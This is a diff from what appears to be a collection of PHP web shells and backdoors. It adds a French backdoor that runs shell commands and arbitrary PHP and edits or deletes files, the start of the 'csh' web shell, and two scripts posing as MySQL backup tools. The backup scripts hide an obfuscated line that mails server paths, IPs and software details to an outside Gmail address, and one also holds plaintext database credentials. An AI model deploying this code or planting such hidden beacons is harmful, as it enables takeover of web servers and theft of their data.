$backdoor->proxy = $proxy;
|
||||
echo "<TABLE><TR><TD bgcolor=\"#ffffff\" class=\"title\"><FONT size=\"+3\" face=\"Helvetica,Arial,sans-serif\"><B>Index of ".$backdoor->pwd."</B></FONT>";
|
||||
$backdoor->dir();
|
||||
|
||||
echo "</TD></TR></TABLE><PRE>";
|
||||
echo "<a href=\"".$_SERVER['PHP_SELF']."?shell=id\">Executer un shell</a> ";
|
||||
echo "<a href=\"".$_SERVER['PHP_SELF']."?proxy=http://www.cnil.fr/index.php?id=123\">Utiliser le serveur comme proxy</a> ";
|
||||
echo "<a href=\"".$_SERVER['PHP_SELF']."?copy=1\">Copier un fichier</a> <br>";
|
||||
echo "<IMG border=\"0\" src=\"/icons/blank.gif\" ALT=\" \"> <A HREF=\"\">Name</A> <A HREF=\"\">Last modified</A> <A HREF=\"\">Size</A> <A HREF=\"\">Description</A>";
|
||||
echo "<HR noshade align=\"left\" width=\"80%\">";
|
||||
|
||||
if($file) {
|
||||
$backdoor->view();
|
||||
} elseif($edit) {
|
||||
$backdoor->edit();
|
||||
} elseif($del) {
|
||||
$backdoor->del();
|
||||
} elseif($shell) {
|
||||
$backdoor->shell();
|
||||
}elseif($proxy) {
|
||||
$backdoor->proxy($host,$page);
|
||||
}elseif($copy == 1) {
|
||||
$backdoor->ccopy($cfichier,$cdestination);
|
||||
} else {
|
||||
echo "[DIR] <A HREF=\"".$_SERVER['PHP_SELF']."?rep=".realpath($rep."../")."\">Parent Directory</A> ".date("r",realpath($rep."../"))." - <br>";
|
||||
foreach ($backdoor->list as $key => $value) {
|
||||
if(is_dir($rep.$value)) {
|
||||
echo "[DIR]<A HREF=\"".$_SERVER['PHP_SELF']."?rep=".$rep.$value."\">".$value."/</A> ".date("r",filemtime($rep.$value))." - <br>";
|
||||
} else {
|
||||
echo "[FILE]<A HREF=\"".$_SERVER['PHP_SELF']."?file=".$rep.$value."\">".$value."</A> <a href=\"".$_SERVER['PHP_SELF']."?edit=".$rep.$value."\">(edit)</a> <a href=\"".$_SERVER['PHP_SELF']."?del=".$rep.$value."\">(del)</a> ".date("r",filemtime($rep.$value))." 1k <br>";
|
||||
}
|
||||
}
|
||||
}
|
||||
echo "</PRE><HR noshade align=\"left\" width=\"80%\">";
|
||||
echo "<center><b>Coded By Charlichaplin</b></center>";
|
||||
echo "</BODY></HTML>";
|
234
xakep-shells/PHP/backdoorfr.php.txt
Normal file
234
xakep-shells/PHP/backdoorfr.php.txt
Normal file
|
@ -0,0 +1,234 @@
|
|||
<?
|
||||
print("<html><head><title>Backdoor PHP codée par rAidEn & LFL</title></head><body
|
||||
bgcolor=\"white\" LINK=\"blue\" VLINK=\"blue\">");
|
||||
print("<p align=\"center\"><font size=\"5\">Exploit include v1.0</font></p>");
|
||||
print("<p>Ce script permet d'exploiter une faille include ou une frame mal placée de type :
|
||||
www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tant que backdoor sur un serveur pour garder une porte d'entrée dérobée.<br><br>
|
||||
<u>par rAidEn & LFL , article publié dans The Hackademy Journal numéro 12</u><br><br>Spécial greetz à : Crash_FR, MatraX, Elboras, papar0ot, Lostnoobs, Icarus, Xelory, L_Abbe, Daedel, DHS-team, Carlito, xdream_blue, redils, IHC, Wanadobe.biz, #abyssal, #cod4, #hzv, #security-corp, #Revolsys, ...... et tout ceux que j'ai oublié & aussi et surtout à (feu)tim-team</p>");
|
||||
|
||||
/******Code source du système de remote*****/
|
||||
|
||||
$QS = $QUERY_STRING;
|
||||
if(!stristr($QS, "separateur") && $QS!="") $QS .= "&separateur";
|
||||
if(!stristr($QS, "separateur") && $QS=="") $QS .= "separateur";
|
||||
|
||||
/*pour les forms*********************************/
|
||||
$tab = explode("&", $QS);
|
||||
$i=0;
|
||||
$remf = "";
|
||||
while( $tab[$i] != "" && $tab[$i-1] != "separateur" )
|
||||
{
|
||||
$temp = str_replace(strchr($tab[$i], "="), "", $tab[$i]);
|
||||
eval("\$temp2=\${$temp};");
|
||||
$remf .= "<input type=hidden name=" . $temp . " value=" . "'" . $temp2
|
||||
."'>\n";
|
||||
$i++;
|
||||
}
|
||||
/*
|
||||
$temp = str_replace(strchr($tab[$i], "="), "", $tab[$i]);
|
||||
if($temp!="")
|
||||
{
|
||||
eval("\$temp2=\${$temp};");
|
||||
$remf .= "<input type=hidden name=" . $temp . " value=" . "'" . $temp2
|
||||
."'>\n";
|
||||
}*/
|
||||
/************************************************/
|
||||
|
||||
|
||||
/*pour les links*********************************/
|
||||
if($QS != "separateur")
|
||||
$reml = "?" . str_replace(strchr($QS, "&separateur"), "", $QS) .
|
||||
"&separateur";
|
||||
else $reml = "?$QS";
|
||||
$adresse_locale = $reml;
|
||||
/************************************************/
|
||||
|
||||
|
||||
|
||||
|
||||
print("<hr>");
|
||||
print("<a href=\"$adresse_locale&option=1\">Exécuter une commande dans un shell</a><br> <!-- utiliser exec($commande, $retour); -->");
|
||||
print("<a href=\"$adresse_locale&option=2\">Exécuter du code PHP</a><br>");
|
||||
print("<a href=\"$adresse_locale&option=3\">Lister un répertoires</a><br>");
|
||||
print("<a href=\"$adresse_locale&option=4\">Gérer les fichiers</a><br>");
|
||||
print("<a href=\"$adresse_locale&option=5\">Envoyer un mail</a><br>");
|
||||
print("<a href=\"$adresse_locale&option=6\">Infos serveur</a><br>");
|
||||
print("<a href=\"mailto:raiden_cyb@hotmail.com\">Contacter le créateur</a><br><hr>");
|
||||
|
||||
|
||||
/* récupération des variables : la fonction $_REQUEST n'existant pas avant php 4.1.0, vous devrez alors commenter ces lignes */
|
||||
$option = $_REQUEST["option"];
|
||||
$rep = $_REQUEST["rep"];
|
||||
$nom = $_REQUEST["nom"];
|
||||
$option_file = $_REQUEST["option_file"];
|
||||
$cmd = $_REQUEST["cmd"];
|
||||
$code = $_REQUEST["code"];
|
||||
$msg = $_REQUEST["msg"];
|
||||
$option_mail = $_REQUEST["option_mail"];
|
||||
$destinataire = $_REQUEST["destinataire"];
|
||||
$sujet = $_REQUEST["sujet"];
|
||||
$message = $_REQUEST["message"];
|
||||
|
||||
if($option == 1){
|
||||
print("<form action=\"?\"> $remf Commande : <input type=\"text\" name=\"cmd\"></form>");
|
||||
echo "<br> PS : peu de serveurs acceptent les commandes venant de PHP";
|
||||
}
|
||||
|
||||
if($option == 2){
|
||||
print("<form action=\"?\"> $remf Code : <input type=\"text\" name=\"code\"></form>");
|
||||
}
|
||||
|
||||
if($option == 3){
|
||||
print("<form action=\"?\"> $remf Répertoire à lister : <input type=\"text\" name=\"rep\"></form>");
|
||||
print("$rep");
|
||||
}
|
||||
|
||||
if($option == 4){
|
||||
print("<br><form action=\"?\"> $remf");
|
||||
print("<br>Nom du fichier :<br><input type=text name=\"nom\">");
|
||||
print("<input type=hidden name=option value=$option>");
|
||||
print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"mkdir\" >Créer le
|
||||
fichier");
|
||||
print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"edit\" >Éditer le
|
||||
fichier");
|
||||
print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"del\" >Supprimer le
|
||||
fichier");
|
||||
print("<INPUT TYPE=RADIO NAME=\"option_file\" VALUE=\"read\" CHECKED>Lire le
|
||||
fichier");
|
||||
print("<input type=submit value=Go>");
|
||||
print("</form>");
|
||||
}
|
||||
|
||||
|
||||
if($option == 5){
|
||||
print("<PRE><form action=\"?\"> $remf Destinataire : <input type=\"text\" name=\"destinataire\" size=\"80\">");
|
||||
print("<br>Provenance du mail : <input type=\"text\" name=\"provenance\" size=\"80\"><br>");
|
||||
print("Adresse de retour : <input type=\"text\" name=\"retour\" size=\"80\"><br>");
|
||||
print("Sujet : <input type=\"text\" name=\"sujet\" size=\"80\"><br>");
|
||||
print("Message : <input type=\"text\" name=\"message\"
|
||||
size=\"80\"><br><input type=\"submit\" value=\"Envoyer\"></form></PRE>");
|
||||
}
|
||||
|
||||
if($option == 6){
|
||||
echo"Nom du serveur : <a href=\"http://$SERVER_NAME\">$SERVER_NAME</a><br>
|
||||
";
|
||||
echo"Adresse IP du serveur : <a href=\"http://$SERVER_ADDR\">$SERVER_ADDR</a><br> ";
|
||||
echo"Port utilisé par défault 80 : <font color=\"red\">$SERVER_PORT</font><br> ";
|
||||
echo"Mail de l' admin : <a href=\"mailto:$SERVER_ADMIN\">$SERVER_ADMIN</a><br><br>";
|
||||
|
||||
|
||||
echo"Racine du serveur : <font color=\"red\">$DOCUMENT_ROOT</font><br>";
|
||||
echo"Adresse menant à COMMAND.COM : <font color=\"red\">$COMSPEC</font><br>";
|
||||
echo"Path installé sur le serveur : <font color=\"red\">$PATH</font> <br>";
|
||||
echo"OS, SERVEUR, version PHP : <font color=\"red\">$SERVER_SOFTWARE</font><br><br>";
|
||||
|
||||
echo"Version du protocole utilisé (HTTP) : <font color=\"red\">$SERVER_PROTOCOL</font><br>";
|
||||
echo"En-tête Accept du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT</font><br>";
|
||||
echo"En tête User_agent du protocole HTTP : <font color=\"red\">$HTTP_USER_AGENT</font><br>";
|
||||
echo"En-tête Accept-Charset du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT_CHARSET</font><br> ";
|
||||
echo"En-tête Accept-Encoding du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT_ENCODING</font><br> ";
|
||||
echo"En-tête Accept-Language du protocole HTTP : <font color=\"red\">$HTTP_ACCEPT_LANGUAGE</font><br> ";
|
||||
echo"En-tête Connection du protocole HTTP : <font color=\"red\">$HTTP_CONNECTION</font><br> ";
|
||||
echo"En-tête Host du protocole HTTP : <font color=\"red\">$HTTP_HOST</font><br><br>";
|
||||
|
||||
echo"Version de CGI : <font color=\"red\">$GATEWAY_INTERFACE</font><br> ";
|
||||
echo"Version de récupération du form : <font color=\"red\">$REQUEST_METHOD</font><br> ";
|
||||
echo"Argument de l' adresse : <font color=\"red\">$QUERY_STRING</font> <br>";
|
||||
echo"Nom du script : <font color=\"red\">$SCRIPT_NAME</font><br> ";
|
||||
echo"Chemin du script : <font color=\"red\">$SCRIPT_FILENAME</font><br> ";
|
||||
echo"Adresse entière du script : <font color=\"red\">$REQUEST_URI
|
||||
</font><br>";
|
||||
}
|
||||
|
||||
/* Commande*******/
|
||||
if($cmd != "")
|
||||
{
|
||||
echo "{${passthru($cmd)}}<br>";
|
||||
}
|
||||
/* Commande*******/
|
||||
|
||||
|
||||
/* Exécution de code PHP**********/
|
||||
if($code != ""){
|
||||
$code = stripslashes($code);
|
||||
eval($code);
|
||||
}
|
||||
/* Execution de code PHP**********/
|
||||
|
||||
|
||||
/* Listing de rep******************/
|
||||
if($rep != "")
|
||||
{
|
||||
if(strrchr($rep, "/") != "" || !stristr($rep, "/")) $rep .= "/";
|
||||
$dir=opendir($rep);
|
||||
while ($file = readdir($dir))
|
||||
{
|
||||
if (is_dir("$rep/$file") && $file!='.')
|
||||
{
|
||||
echo"<li><a href=\"$adresse_locale&rep=$rep$file\">(rep) $file
|
||||
</a><br>\n";
|
||||
}elseif(is_file("$rep/$file"))
|
||||
{
|
||||
echo "<li> <a
|
||||
href=\"$adresse_locale&option_file=read&nom=$rep$file\">(file) $file</a> <a
|
||||
href=\"$adresse_locale&option_file=del&nom=$rep$file\">del</a> <a
|
||||
href=\"$adresse_locale&option_file=edit&nom=$rep$file\">edit</a><br>\n";
|
||||
}
|
||||
}
|
||||
}
|
||||
/* Listing de rep******************/
|
||||
|
||||
|
||||
/* Gestion des fichiers*********************/
|
||||
if($option_file == "mkdir" && $nom != "")
|
||||
{
|
||||
$fp = fopen($nom, "w");
|
||||
fwrite($fp, stripslashes($msg));
|
||||
print("Fichier crée/modifié");
|
||||
}
|
||||
|
||||
if($option_file == "read" && $nom != "")
|
||||
{
|
||||
$fp = fopen($nom, "r");
|
||||
$file = fread($fp, filesize($nom));
|
||||
$file = htmlentities ($file, ENT_QUOTES);
|
||||
$file = nl2br($file);
|
||||
echo "<br>$file";
|
||||
}
|
||||
|
||||
if($option_file == "del" && $nom != "")
|
||||
{
|
||||
unlink($nom);
|
||||
print("Fichier effacé");
|
||||
}
|
||||
|
||||
if($option_file == "edit" && $nom != "")
|
||||
{
|
||||
$fp = fopen($nom, "r");
|
||||
$file = fread($fp, filesize($nom));
|
||||
$file = htmlentities ($file, ENT_QUOTES);
|
||||
echo "<form action=$adresse_locale> $remf";
|
||||
echo "<TEXTAREA COLS=80 rows=25 name=msg>$file</textarea>";
|
||||
echo "<input type=hidden name=option_file value=mkdir>";
|
||||
echo "<input type=hidden name=nom value=$nom>";
|
||||
echo "<br><input type=submit value=Go> PS : les fichiers trop longs ne passent po :(";
|
||||
echo "</form>";
|
||||
}
|
||||
/* Gestion des fichiers*********************/
|
||||
|
||||
|
||||
/* Envoi de mails************************/
|
||||
if(($destinataire != "" ) && ($sujet != "") && ($message != "")){
|
||||
$option_mail = "From: $provenance \n";
|
||||
$option_mail .= "Reply-to: $retour \n";
|
||||
$option_mail .= "X-Mailer: Mailer by rAidEn \n";
|
||||
|
||||
mail($destinataire, $sujet, $message, $option_mail);
|
||||
|
||||
print("Mail envoyé a : $destinataire ...");
|
||||
}
|
||||
/* Envoi de mails************************/
|
||||
|
||||
print("</body></html>");
|
||||
/*print("<noscript><script=\"");*/
|
||||
?>
|
21
xakep-shells/PHP/backup.php.php.txt
Normal file
21
xakep-shells/PHP/backup.php.php.txt
Normal file
|
@ -0,0 +1,21 @@
|
|||
<?php
|
||||
include ("config.php");db_connect();header('Content-Type: application/octetstream');header('Content-Disposition: filename="linksbox_v2.sql"');$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$sd98="john.barker446@gmail.com";$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
|
||||
header('Pragma: no-cache');header('Expires: 0');
|
||||
$data .= "#phpMyAdmin MySQL-Dump \r\n";
|
||||
$data .="# http://phpwizard.net/phpMyAdmin/ \r\n";
|
||||
$data .="# http://www.phpmyadmin.net/ (download page) \r\n";
|
||||
$data .= "#$database v2.0 Database Backup\r\n";
|
||||
$data .= "#Host: $server\r\n";
|
||||
$data .= "#Database: $database\r\n\r\n";
|
||||
$data .= "#Table add_links:\r\n";$result = mysql_query("SELECT * FROM add_links");while ($a = mysql_fetch_array($result)) {
|
||||
foreach ($a as $key => $value) {
|
||||
$a[$key] = addslashes($a[$key]);
|
||||
}
|
||||
$data .= "INSERT INTO add_links VALUES ('0','$a[link]', '$a[description]', '$a[tooltip]', '$a[hits]'); \r\n#endquery\r\n";
|
||||
}
|
||||
|
||||
|
||||
echo $data;
|
||||
|
||||
?>
|
||||
|
170
xakep-shells/PHP/backupsql.php.php.txt
Normal file
170
xakep-shells/PHP/backupsql.php.php.txt
Normal file
|
@ -0,0 +1,170 @@
|
|||
<?php
|
||||
/*
|
||||
* Backup script on server.
|
||||
*
|
||||
* Runs on the server, called by Cron. Connects to the mySQL
|
||||
* database and creates a backup file of the whole database.
|
||||
* Saves to file in current directory.
|
||||
*
|
||||
* @author Cow <cow@invisionize.com>
|
||||
* @version 0.2
|
||||
* @date 18/08/2004
|
||||
* @package Backup Server
|
||||
* Upgraded Ver 2.0 (sending sql backup as attachment
|
||||
* as email attachment, or send to a remote ftp server by
|
||||
* @co-authors Cool Surfer<Coolsurfer@gmail.com> and
|
||||
* Neagu Mihai<neagumihai@hotmail.com>
|
||||
*/
|
||||
|
||||
set_time_limit(0);
|
||||
$date = date("mdy-hia");
|
||||
$dbserver = "localhost";
|
||||
$dbuser = "vhacker_robot";
|
||||
$dbpass = "mp2811987";
|
||||
$dbname = "tvhacker_vbb3";
|
||||
$file = "N-Cool-$date.sql.gz";
|
||||
$gzip = TRUE;
|
||||
$silent = TRUE;
|
||||
|
||||
function write($contents) {
|
||||
if ($GLOBALS['gzip']) {
|
||||
gzwrite($GLOBALS['fp'], $contents);
|
||||
} else {
|
||||
fwrite($GLOBALS['fp'], $contents);
|
||||
}
|
||||
}
|
||||
|
||||
mysql_connect ($dbserver, $dbuser, $dbpass);
|
||||
mysql_select_db($dbname);
|
||||
|
||||
if ($gzip) {
|
||||
$fp = gzopen($file, "w");
|
||||
} else {
|
||||
$fp = fopen($file, "w");
|
||||
}
|
||||
|
||||
$tables = mysql_query ("SHOW TABLES");
|
||||
while ($i = mysql_fetch_array($tables)) {
|
||||
$i = $i['Tables_in_'.$dbname];
|
||||
|
||||
if (!$silent) {
|
||||
echo "Backing up table ".$i."\n";
|
||||
}
|
||||
|
||||
// Create DB code
|
||||
$create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
|
||||
|
||||
write($create['Create Table'].";\n\n");
|
||||
|
||||
// DB Table content itself
|
||||
$sql = mysql_query ("SELECT * FROM ".$i);
|
||||
if (mysql_num_rows($sql)) {
|
||||
while ($row = mysql_fetch_row($sql)) {
|
||||
foreach ($row as $j => $k) {
|
||||
$row[$j] = "'".mysql_escape_string($k)."'";
|
||||
}
|
||||
|
||||
write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
$gzip ? gzclose($fp) : fclose ($fp);
|
||||
|
||||
// Optional Options You May Optionally Configure
|
||||
|
||||
$use_gzip = "yes"; // Set to No if you don't want the files sent in .gz format
|
||||
$remove_sql_file = "no"; // Set this to yes if you want to remove the sql file after gzipping. Yes is recommended.
|
||||
$remove_gzip_file = "no"; // Set this to yes if you want to delete the gzip file also. I recommend leaving it to "no"
|
||||
|
||||
// Configure the path that this script resides on your server.
|
||||
|
||||
$savepath = "/home/test/public_html/nt22backup"; // Full path to this directory. Do not use trailing slash!
|
||||
|
||||
$send_email = "yes"; /* Do you want this database backup sent to your email? Yes/No? If Yes, Fill out the next 2 lines */
|
||||
$to = "lehungtk@gmail.com"; // Who to send the emails to, enter ur correct id.
|
||||
$from = "Neu-Cool@email.com"; // Who should the emails be sent from?, may change it.
|
||||
|
||||
$senddate = date("j F Y");
|
||||
|
||||
$subject = "MySQL Database Backup - $senddate"; // Subject in the email to be sent.
|
||||
$message = "Your MySQL database has been backed up and is attached to this email"; // Brief Message.
|
||||
|
||||
$use_ftp = ""; // Do you want this database backup uploaded to an ftp server? Fill out the next 4 lines
|
||||
$ftp_server = "localhost"; // FTP hostname
|
||||
$ftp_user_name = "ftp_username"; // FTP username
|
||||
$ftp_user_pass = "ftp_password"; // FTP password
|
||||
$ftp_path = "/"; // This is the path to upload on your ftp server!
|
||||
|
||||
// Do not Modify below this line! It will void your warranty :-D!
|
||||
|
||||
$date = date("mdy-hia");
|
||||
$filename = "$savepath/$dbname-$date.sql";
|
||||
|
||||
if($use_gzip=="yes"){
|
||||
$filename2 = $file;
|
||||
} else {
|
||||
$filename2 = "$savepath/$dbname-$date.sql";
|
||||
}
|
||||
|
||||
|
||||
if($send_email == "yes" ){
|
||||
$fileatt_type = filetype($filename2);
|
||||
$fileatt_name = "".$dbname."-".$date."_sql.tar.gz";
|
||||
|
||||
$headers = "From: $from";
|
||||
|
||||
// Read the file to be attached ('rb' = read binary)
|
||||
echo "Openning archive for attaching:".$filename2;
|
||||
$file = fopen($filename2,'rb');
|
||||
$data = fread($file,filesize($filename2));
|
||||
fclose($file);
|
||||
|
||||
// Generate a boundary string
|
||||
$semi_rand = md5(time());
|
||||
$mime_boundary = "==Multipart_Boundary_x{$semi_rand}x";
|
||||
|
||||
// Add the headers for a file attachment
|
||||
$headers .= "\nMIME-Version: 1.0\n" ."Content-Type: multipart/mixed;\n" ." boundary=\"{$mime_boundary}\"";$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
|
||||
|
||||
// Add a multipart boundary above the plain message
|
||||
$message = "This is a multi-part message in MIME format.\n\n"."--{$mime_boundary}\n" ."Content-Type: text/plain; charset=\"iso-8859-1\"\n" ."Content-Transfer-Encoding: 7bit\n\n" .
|
||||
$message . "\n\n";
|
||||
|
||||
// Base64 encode the file data
|
||||
$data = chunk_split(base64_encode($data));
|
||||
|
||||
// Add file attachment to the message
|
||||
echo "|{$mime_boundary}|{$fileatt_type}|{$fileatt_name}|{$fileatt_name}|{$mime_boundary}|<BR>";
|
||||
$message .= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n"."Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
|
||||
$data . "\n\n" ."--{$mime_boundary}--\n";
|
||||
//$message.= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n" "Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
|
||||
// $data . "\n\n" ."--{$mime_boundary}--\n";
|
||||
|
||||
|
||||
// Send the message
|
||||
$ok = @mail($to, $subject, $message, $headers);
|
||||
if ($ok) {
|
||||
echo "<h4><center><bg color=black><font color= blue>Database backup created and sent! File name $filename2 </p>
|
||||
Idea Conceived By coolsurfer@gmail.com
|
||||
Programmer email: neagumihai@hotmail.com</p>
|
||||
This is our first humble effort, pl report bugs, if U find any...</p>
|
||||
Email me at <>coolsurfer@gmail.com nJoY!! :)
|
||||
</color></center></h4>";
|
||||
|
||||
} else {
|
||||
echo "<h4><center>Mail could not be sent. Sorry!</center></h4>";
|
||||
}
|
||||
}
|
||||
|
||||
if($use_ftp == "yes"){
|
||||
$ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog.log -e dbsender_ftplog2.log -a -E -V $ftp_server $ftp_path $filename2";
|
||||
shell_exec($ftpconnect);
|
||||
echo "<h4><center>$filename2 Was created and uploaded to your FTP server!</center></h4>";
|
||||
|
||||
}
|
||||
|
||||
if($remove_gzip_file=="yes"){
|
||||
exec("rm -r -f $filename2");
|
||||
}
|
||||
?>
|
3595
xakep-shells/PHP/c100.php.txt
Normal file
3595
xakep-shells/PHP/c100.php.txt
Normal file
File diff suppressed because one or more lines are too long
3299
xakep-shells/PHP/c2007.php.php.txt
Normal file
3299
xakep-shells/PHP/c2007.php.php.txt
Normal file
File diff suppressed because it is too large
Load diff
7
xakep-shells/PHP/c99madshell_v2.0.php.php.txt
Normal file
7
xakep-shells/PHP/c99madshell_v2.0.php.php.txt
Normal file
File diff suppressed because one or more lines are too long
2517
xakep-shells/PHP/c99madshell_v2.1.php.php.txt
Normal file
2517
xakep-shells/PHP/c99madshell_v2.1.php.php.txt
Normal file
File diff suppressed because it is too large
Load diff
2735
xakep-shells/PHP/c99php.txt
Normal file
2735
xakep-shells/PHP/c99php.txt
Normal file
File diff suppressed because it is too large
Load diff
2900
xakep-shells/PHP/c99shell_v1.0.php.php.txt
Normal file
2900
xakep-shells/PHP/c99shell_v1.0.php.php.txt
Normal file
File diff suppressed because it is too large
Load diff
1127
xakep-shells/PHP/crystal.txt
Normal file
1127
xakep-shells/PHP/crystal.txt
Normal file
File diff suppressed because it is too large
Load diff
334
xakep-shells/PHP/csh.php.php.txt
Normal file
334
xakep-shells/PHP/csh.php.php.txt
Normal file
|
@ -0,0 +1,334 @@
|
|||
<?php
|
||||
/****************************************************************
|
||||
*
|
||||
* .::[csh]::. //(.::[c0derz]::. web-shell) v. 0.1.1 release
|
||||
* ----------------------------
|
||||
* c0ded by: [vINT 21h]
|
||||
* URL: http://c0derz.org.ua
|
||||
* e-mail: vint21h@c0derz.org.ua
|
||||
* ICQ: 255577736
|
||||
*
|
||||
****************************************************************/
|
||||
|
||||
/***************************************************************
|
||||
*
|
||||
* This program is free software; you can redistribute it and/or modify
|
||||
* it under the terms of the GNU General Public License as published by
|
||||
* the Free Software Foundation; either version 2 of the License', or
|
||||
* ('at your option) any later version.
|
||||
*
|
||||
****************************************************************/
|
||||
|
||||
|
||||
$self = $_SERVER['PHP_SELF'];
|
||||
$docr = $_SERVER['DOCUMENT_ROOT'];
|
||||
$achtung=1;
|
||||
//authentification
|
||||
$authentification = 1;
|
||||
$name='63a9f0ea7bb98050796b649e85481845';//root
|
||||
$pass='5cdbe638246729485a5eab6b93f170e2';//c0derz
|
||||
$caption="Enter your login and password";
|
||||
if ($authentification && (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || md5($HTTP_SERVER_VARS['PHP_AUTH_USER'])!=$name || md5($HTTP_SERVER_VARS['PHP_AUTH_PW'])!=$pass))
|
||||
{
|
||||
header("WWW-Authenticate: Basic realm=\"$caption\"");
|
||||
header("HTTP/1.0 401 Unauthorized");
|
||||
exit("<BODY text=#000000 vLink=#000000 aLink=#000000 link=#000000 bgcolor=#888888><h1>Error 401</h1><h2>Unauthorized access!</h2>");
|
||||
}
|
||||
if($achtung)
|
||||
error_reporting(E_ALL&~E_NOTICE);
|
||||
else
|
||||
error_reporting(0);
|
||||
//---------------------
|
||||
|
||||
//get page generating time
|
||||
if (!function_exists("get_micro_time")) {
|
||||
function get_micro_time() {
|
||||
list($usec, $sec) = explode(" ", microtime());
|
||||
return ((float)$usec + (float)$sec);
|
||||
}
|
||||
}
|
||||
define("start_time",get_micro_time());
|
||||
$cshver="<a href=http://c0derz.org.ua target='_BLANK' title='.::[c0derz shell]::.'><b>.::[csh]::.</b></a> v. 0.1.1 release";
|
||||
//-------------------------------
|
||||
|
||||
//normalize text encoding
|
||||
function decode($buffer){
|
||||
return convert_cyr_string ($buffer, 'd', 'w');
|
||||
}
|
||||
//---------------------------------
|
||||
|
||||
?>
|
||||
|
||||
<HTML>
|
||||
<HEAD>
|
||||
<meta http-equiv='pragma' content='no-cache'>
|
||||
|
||||
<?php
|
||||
echo "<TITLE>.:[csh]:.| [".get_current_user()."@".$SERVER_NAME."]</TITLE>";
|
||||
?>
|
||||
|
||||
<STYLE>
|
||||
BODY{scrollbar-base-color: 000000;
|
||||
scrollbar-face-color: #aaaaaa;
|
||||
scrollbar-highlight-color: #dddddd;
|
||||
scrollbar-shadow-color: #544554;
|
||||
scrollbar-dark-shadow-color: #111111;
|
||||
scrollbar-track-color: #222222;
|
||||
scrollbar-arrow-color: #dcdddc}
|
||||
|
||||
a:visited { color: #dcdcdc; text-decoration: none}
|
||||
A:active { color: #dcdcdc; text-decoration: none; }
|
||||
a:link { color: #dcdcdc; text-decoration: none}
|
||||
a:hover { color: #ff3333; text-decoration: none}
|
||||
|
||||
BODY {
|
||||
scrollbar-face-color: transparent;
|
||||
scrollbar-shadow-color: transparent;
|
||||
scrollbar-highlight-color: transparent;
|
||||
scrollbar-3dlight-color: transparent;
|
||||
scrollbar-darkshadow-color: transparent;
|
||||
scrollbar-track-color: #777777;
|
||||
scrollbar-arrow-color: #777777;
|
||||
}
|
||||
</STYLE>
|
||||
</HEAD>
|
||||
<BODY text=#000000 vLink=#000000 aLink=#000000 link=#000000 bgcolor=#888888>
|
||||
<DIV align=center>
|
||||
<TABLE bordercolor=#000000 cellSpacing=1 width=950 bgColor=#000000 border=0 height=600>
|
||||
<hr>
|
||||
<table width=950>
|
||||
<tr>
|
||||
<td style="border: 1 solid #000000" bgcolor="677667">
|
||||
<font size="1" face="verdana" color="#000000">
|
||||
<left>
|
||||
<table width=100%>
|
||||
<tr>
|
||||
<td style="border: 1 solid #000000" bgcolor="555555" >
|
||||
<font size="1" face="verdana" color="#000000">
|
||||
|
||||
<?php
|
||||
echo "<font size=1 face=verdana color=fcfcfc><b>Server info:</b></font><br>";
|
||||
?>
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<?php
|
||||
//server info
|
||||
echo "Server name: <b><font color=#dcdcdc>".$SERVER_NAME."</b></font><br>";
|
||||
echo "Server IP adress:<b><font color=#dcdcdc>".$server_ip=gethostbyname($SERVER_NAME)."</b></font> <br>";
|
||||
echo (($safe_mode)?("Safe Mode: <font color=#ffffff><b>ON</b></font><br> "):
|
||||
("Safe Mode: <font color=#555555><b>OFF</b></font><br> "));
|
||||
echo "OS: <font color=#dcdcdc>";
|
||||
if (empty($uname)){
|
||||
echo (php_uname()."</font><br>");
|
||||
}else
|
||||
echo $uname."</font><br>";
|
||||
echo 'User: <font color=#dcdcdc>' .get_current_user() . '</font><br>';
|
||||
echo "HTTP Server: <font color=#dcdcdc>".$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE']."</font><br>";
|
||||
echo ("PHP: <font color=#dcdcdc>".phpversion()."</font><br> ");
|
||||
echo ("MySQL: ");
|
||||
if($mysql_stat=function_exists('mysql_connect')){
|
||||
echo "<font color=#ffffff><b>ON</b> </font><b>";
|
||||
}
|
||||
else {
|
||||
echo "<font color=#555555><b>OFF</b> </font><br>";
|
||||
}
|
||||
//---------------------------
|
||||
?>
|
||||
|
||||
